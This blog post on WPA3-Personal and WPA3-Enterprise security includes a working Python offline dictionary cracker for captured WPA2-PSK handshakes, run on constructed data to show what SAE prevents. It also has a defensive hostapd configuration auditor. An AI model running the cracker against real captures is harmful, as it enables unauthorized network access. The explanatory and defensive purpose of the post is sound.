WPA3: Why New Security Methods are Needed
Last week, we kicked off a new blog series about WPA3 in the enterprise. We took a brief look at the history of Wi-Fi security, most recently WPA2, and set the stage for WPA3. This week, we explore what makes WPA3 different from WPA2. While WPA2 may have served us well for many years, it will soon be time for WPA2 to join Betamax, cassette tapes, and 802.11b in the technology graveyard. WPA3 is the future of Wi-Fi security.
On the WPA3-Personal side, WEP and TKIP are disallowed and Protected Management Frames (PMF) are required. Password-based authentication is also more resilient: the Pre-Shared Key (PSK) handshake is replaced by Simultaneous Authentication of Equals (SAE), a password-authenticated key establishment protocol defined in the IEEE 802.11 specification, which gives users stronger protection against password-guessing attempts by third parties.
Key Things to Know About WPA3 Personal
- WPA3-Personal uses the password to authenticate (each side proves knowledge of it) rather than as the direct input to session-key derivation, and the password itself is never transmitted during the exchange
- The SAE handshake negotiates a fresh Pairwise Master Key (PMK) for each client association; that PMK then feeds the familiar Wi‑Fi four-way handshake, which derives the session keys
- Neither the PMK nor the password used in the SAE exchange can be recovered by a passive observer, an active attacker, or an offline dictionary attack. Each run of the exchange lets the peer test exactly one password guess, so an attacker who wants to try a thousand candidates must perform a thousand live exchanges against the network, where attempts can be rate-limited and detected, rather than testing them offline against a captured handshake
- This reduces, though does not remove, the dependence on password strength: users no longer need long, hard-to-remember passphrases to defeat offline cracking, but a guessable password is still exposed to online guessing, one attempt per exchange
- The good news is that client devices supporting both WPA2-Personal and WPA3-Personal will connect using WPA3-Personal when the network offers it, including on a network running WPA3 transition mode alongside WPA2-PSK
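To see why the SAE property above matters, here is the attack it removes. The following is an added example written for this post, not code from the original article or from any vendor: it reimplements the IEEE 802.11i key derivation that WPA2-Personal uses (PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-SHA1 MIC over the EAPOL-Key frame) and runs an offline dictionary attack against a four-way handshake. The "capture" (SSID, MAC addresses, nonces, wordlist and true passphrase) is constructed inside the script; no real network is involved.

```python
"""Offline dictionary attack against a WPA2-PSK four-way handshake.

Added example (not from the original post).  Everything below the helpers is
constructed test data so the script runs offline.
"""
import hashlib
import hmac
import struct

MIC_OFF = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-Personal: the PMK is a deterministic function of passphrase and SSID,
    # so anyone holding a capture can recompute it for any candidate passphrase.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    #                                  min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))
    label = b"Pairwise key expansion"
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 truncated to 16 bytes.
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def build_msg2(kck: bytes, snonce: bytes) -> bytes:
    # EAPOL-Key message 2 of 4 (client -> AP), key data left empty.
    body = (b"\x02"                           # descriptor type: RSN
            + struct.pack(">HH", 0x010A, 16)  # key info (v2, pairwise, MIC), key length
            + b"\x00" * 8 + snonce            # replay counter, SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # IV, RSC, reserved
            + b"\x00" * 16 + b"\x00\x00")     # MIC placeholder, key data length 0
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body
    mic = eapol_mic(kck, frame)               # MIC is computed with the MIC field zeroed
    return frame[:MIC_OFF] + mic + frame[MIC_OFF + 16:]


def crack_wpa2(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Return the passphrase from wordlist that reproduces the captured MIC, or None."""
    captured_mic = msg2[MIC_OFF:MIC_OFF + 16]
    zeroed = msg2[:MIC_OFF] + b"\x00" * 16 + msg2[MIC_OFF + 16:]
    for candidate in wordlist:
        kck = prf512(wpa2_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate  # no interaction with the AP was needed for any guess
    return None


# ---- constructed "capture": not from a real network ----
SSID = "corp-legacy"
AA = bytes.fromhex("001122334455")   # AP MAC, constructed
SPA = bytes.fromhex("66778899aabb")  # client MAC, constructed
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
TRUE_PASSPHRASE = "Summer2019!"
CAPTURED_MSG2 = build_msg2(
    prf512(wpa2_pmk(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16], SNONCE)
WORDLIST = ["password", "letmein", "Summer2019!", "correct horse battery staple"]

if __name__ == "__main__":
    print("recovered passphrase:",
          crack_wpa2(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

Every candidate is checked purely from the captured bytes, which is exactly the oracle SAE removes: in WPA3-Personal the PMK comes from the Diffie-Hellman result of the SAE exchange and fresh per-session randomness, so a captured transcript gives an attacker nothing to compare a guess against, and each guess costs a live exchange with the AP.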
WPA3-Enterprise networks likewise use current security methods and disallow legacy protocols such as Temporal Key Integrity Protocol (TKIP) and WEP. WPA3-Enterprise also requires Protected Management Frames (PMF): on a WPA3-Enterprise network PMF cannot be disabled or left optional, so any device certified for WPA3 must support it.
Key Things to Know about WPA3 Enterprise
- An optional 192-bit security mode provides additional protection for segmented networks carrying sensitive data, such as in government, healthcare, or finance
- WPA3-Enterprise 192-bit mode ensures the right combination of cryptographic tools is used, and sets a consistent security baseline within a WPA3 network
- 192-bit mode specifies the configuration of each cryptographic component so that the overall security of the network is consistent. This not only delivers the desired security level but also makes provisioning easier. The approach rests on the principle that every cryptographic primitive has a work factor an attacker must pay, and an attacker will target the weakest component in a system, so all components are pinned to the same strength: AES-GCMP-256 for data, BIP-GMAC-256 for management frames, HMAC-SHA384 for key derivation, and 384-bit elliptic-curve (or at least 3072-bit RSA) certificates for EAP-TLS
- WPA3-Enterprise does not fundamentally change the protocols defined in WPA2-Enterprise: authentication is still 802.1X/EAP against a RADIUS server, so existing client devices will continue to interoperate with WPA3-Enterprise networks (the 192-bit mode is the exception, since it requires matching client support)
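The requirements above (no WPA1/TKIP, PMF mandatory with WPA3 AKMs, a matched cipher set in 192-bit mode) are easy to get wrong in an access-point configuration. The following is an added example, not code from the original post, from hostapd, or from any vendor: it audits a hostapd.conf against those rules using hostapd's real option names (wpa, wpa_key_mgmt, wpa_pairwise, rsn_pairwise, ieee80211w, group_mgmt_cipher, sae_require_mfp, ieee8021x). The three sample configurations, including their RADIUS address and secrets, are constructed for the demonstration.

```python
"""Audit a hostapd.conf for the WPA3 baseline.

Added example (not from the original post or from hostapd).  Sample configs
below are constructed; their addresses and secrets are placeholders.
"""

WPA3_AKMS = {"SAE", "WPA-EAP-SUITE-B-192"}


def parse_conf(text: str) -> dict:
    """Minimal hostapd.conf reader: key=value lines, '#' comments, last value wins."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(conf: dict) -> list:
    """Return findings; an empty list means the config meets the WPA3 baseline."""
    findings = []
    akms = set(conf.get("wpa_key_mgmt", "").split())
    rsn_pairwise = set(conf.get("rsn_pairwise", "").split())
    pairwise = rsn_pairwise | set(conf.get("wpa_pairwise", "").split())
    pmf = conf.get("ieee80211w", "0")  # 0 = disabled, 1 = optional, 2 = required

    if conf.get("wpa") != "2":
        findings.append("wpa=%s: WPA3 networks must be RSN-only (wpa=2); WPA1 is disallowed"
                        % conf.get("wpa", "unset"))
    if "TKIP" in pairwise:
        findings.append("TKIP is allowed as a pairwise cipher; WPA3 disallows TKIP")
    if "WPA-PSK" in akms and "SAE" not in akms:
        findings.append("WPA2-PSK only: a captured four-way handshake allows offline guessing")
    if akms & WPA3_AKMS and pmf != "2":
        # Transition mode is the one case where PMF may be 'optional': WPA2 clients
        # may skip it, while sae_require_mfp=1 still forces it for SAE clients.
        transition = ({"WPA-PSK", "SAE"} <= akms and pmf == "1"
                      and conf.get("sae_require_mfp") == "1")
        if not transition:
            findings.append("PMF must be required (ieee80211w=2) when a WPA3 AKM is offered")
    if "WPA-EAP-SUITE-B-192" in akms:
        # 192-bit mode pins every component to one strength; no mixing allowed.
        if akms != {"WPA-EAP-SUITE-B-192"}:
            findings.append("192-bit mode must not be mixed with other AKMs")
        if rsn_pairwise != {"GCMP-256"}:
            findings.append("192-bit mode requires rsn_pairwise=GCMP-256 and no other cipher")
        if conf.get("group_mgmt_cipher") != "BIP-GMAC-256":
            findings.append("192-bit mode requires group_mgmt_cipher=BIP-GMAC-256")
        if conf.get("ieee8021x") != "1":
            findings.append("192-bit mode is 802.1X/EAP only; set ieee8021x=1")
    return findings


# ---- constructed sample configurations ----
WEAK_WPA2 = """
interface=wlan0
ssid=corp-legacy
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
rsn_pairwise=CCMP
wpa_passphrase=Summer2019!
ieee80211w=0
"""

PERSONAL_TRANSITION = """
interface=wlan0
ssid=corp-guest
wpa=2
wpa_key_mgmt=WPA-PSK SAE
rsn_pairwise=CCMP
ieee80211w=1
sae_require_mfp=1
sae_password=placeholder-guest-password
"""

ENTERPRISE_192 = """
interface=wlan0
ssid=corp-secure
wpa=2
ieee8021x=1
wpa_key_mgmt=WPA-EAP-SUITE-B-192
rsn_pairwise=GCMP-256
group_mgmt_cipher=BIP-GMAC-256
ieee80211w=2
auth_server_addr=10.0.0.5
auth_server_port=1812
auth_server_shared_secret=placeholder-radius-secret
"""

if __name__ == "__main__":
    for name, text in [("weak WPA2", WEAK_WPA2), ("WPA3 transition", PERSONAL_TRANSITION),
                       ("WPA3-Enterprise 192-bit", ENTERPRISE_192)]:
        print(name, "->", audit(parse_conf(text)) or "OK")
```

The weak configuration trips three findings (WPA1 enabled, TKIP allowed, WPA2-PSK only); the transition and 192-bit configurations pass. Note that the 192-bit check treats GCMP-256 and BIP-GMAC-256 as the only acceptable ciphers, which is the "consistent baseline" point above: a single weaker component would set the work factor for the whole network.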
Next time, we will look further in-depth at key timelines to consider for WPA3 adoption, questions to ask your vendors, and what to consider when planning for network upgrades.